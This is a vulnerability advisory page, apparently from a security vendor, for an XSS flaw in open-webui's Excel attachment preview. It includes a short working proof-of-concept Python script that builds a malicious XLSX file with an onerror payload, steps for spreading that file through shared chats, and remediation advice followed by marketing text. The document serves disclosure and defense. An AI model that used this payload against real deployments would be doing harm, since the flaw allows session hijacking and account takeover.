CVE-2026-44549

CVE-2026-44549 is a high-severity cross-site scripting (XSS) vulnerability in open-webui (pip), affecting versions <= 0.7.2. It is fixed in 0.8.0.

Summary

Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger.

Details

The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133
XLSX attachments are processed by this function, converted to HTML with XLSX.utils.sheet_to_html before ultimately being assigned to the variable excelHtml. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected.
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400

PoC

A python script to generate a payload file is as follows:

import xlsxwriter                                                                                                                
                                                                                                                                 
payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">'                                                          
                                                                                                                             
workbook = xlsxwriter.Workbook('xss_payload.xlsx')                                                                           
worksheet = workbook.add_worksheet()                                                                                         
                                                                                                                             
payload_format = workbook.add_format()                                                                                       
                                                                                                                             
worksheet.write_rich_string('A1',                                                                                            
    'This cell contains a hidden payload: ',                                                                                 
    payload_format, payload                                                                                                  
)                                                                                                                            
                                                                                                                             
worksheet.write('A2', 'This is a safe cell.')                                                                                
worksheet.write('B1', 'Column B')                                                                                            
                                                                                                                             
workbook.close()

Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers.

This same process can be triggered in shared chats, allowing the payload to be distributed to victims.

Caveats

The file attachment in the shared chat must be opened and previewed to trigger the vulnerability.

Impact

Any user can create a weaponised chat that can be shared and subsequently used to target other users.

Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.

Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch.

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

CVE-2026-44549 has a CVSS score of 7.3 (High). The vector is network-reachable, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.8.0); upgrading removes the vulnerable code path.

Affected versions

open-webui (<= 0.7.2)

Security releases

open-webui → 0.8.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Sanitise the generated HTML with DOMPurify before assigning it to the DOM.

Frequently Asked Questions

  1. What is CVE-2026-44549? CVE-2026-44549 is a high-severity cross-site scripting (XSS) vulnerability in open-webui (pip), affecting versions <= 0.7.2. It is fixed in 0.8.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. How severe is CVE-2026-44549? CVE-2026-44549 has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of open-webui are affected by CVE-2026-44549? open-webui (pip) versions <= 0.7.2 is affected.
  4. Is there a fix for CVE-2026-44549? Yes. CVE-2026-44549 is fixed in 0.8.0. Upgrade to this version or later.
  5. Is CVE-2026-44549 exploitable, and should I be worried? Whether CVE-2026-44549 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-44549 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44549? Upgrade open-webui to 0.8.0 or later.

Other vulnerabilities in open-webui

CVE-2026-54022CVE-2026-54021CVE-2026-54019CVE-2026-54018CVE-2026-54017

Stop the waste.
Protect your environment with Kodem.